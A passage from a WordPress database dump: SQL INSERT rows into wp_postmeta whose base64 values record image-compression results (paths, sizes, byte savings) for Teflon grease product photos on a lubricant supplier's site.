c2UtTVMtVE1XLUpBUi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjYyNywiaWQiOjE4MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNjI5LCJpZCI6MTgwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI2MzIsImlkIjoxODA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNjM1LCJpZCI6MTgwOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjYzOCwiaWQiOjE4MDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI2NDAsImlkIjoxODA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTQ1MHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctSkFSLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNjQzLCJpZCI6MTgwOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy1KQVItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLUpBUi05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjE1OCwidGltZSI6MTQ4MzU2MjY0NiwiaWQiOjE4MDl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29148, 1808, 'wpfc_optimisation_reduction', '21359'); 
INSERT INTO `wp_postmeta` VALUES (29149, 1808, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVcuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYyNjUxLCJpZCI6IjE4MDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODE2LCJ0aW1lIjoxNDgzNTYyNjU0LCJpZCI6MTgwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI0NjIsInRpbWUiOjE0ODM1NjI2NTcsImlkIjoxODA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjE2OSwidGltZSI6MTQ4MzU2MjY2MSwiaWQiOjE4MDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjk5MTEsInRpbWUiOjE0ODM1NjI2NjUsImlkIjoxODA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTUwLCJ0aW1lIjoxNDgzNTYyNjY5LCJpZCI6MTgwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxMywidGltZSI6MTQ4MzU2MjY3MiwiaWQiOjE4MDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzEsInRpbWUiOjE0ODM1NjI2NzUsImlkIjoxODA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTM5OSwidGltZSI6MTQ4MzU2MjY3OSwiaWQiOjE4MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQyNywidGltZSI6MTQ4MzU2MjY4MiwiaWQiOjE4MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjYxMCwidGltZSI6MTQ4MzU2MjY4NSwiaWQiOjE4MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjcxMiwidGltZSI6MTQ4MzU2MjY4OSwiaWQiOjE4MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVE1XLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg2MywidGltZSI6MTQ4MzU2MjY5MywiaWQiOjE4MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRNVy05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1UTVctOTB4OTAuanBnIiwicmVkdWN0aW9uIjozOTYsInRpbWUiOjE0ODM1NjI2OTYsImlkIjoxODA4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29150, 1807, 'wpfc_optimisation_reduction', '3160303'); 
INSERT INTO `wp_postmeta` VALUES (29151, 1807, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQuanBnIiwicmVkdWN0aW9uIjozMTYwMDc1LCJ0aW1lIjoxNDgzNTYyNzA4LCJpZCI6IjE4MDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2MjcxMSwiaWQiOjE4MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTYyNzE0LCJpZCI6MTgwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLUdyZWFzZS1NUy1USFQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjI3MTcsImlkIjoxODA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1HcmVhc2UtTVMtVEhULTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tR3JlYXNlLU1TLVRIVC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1l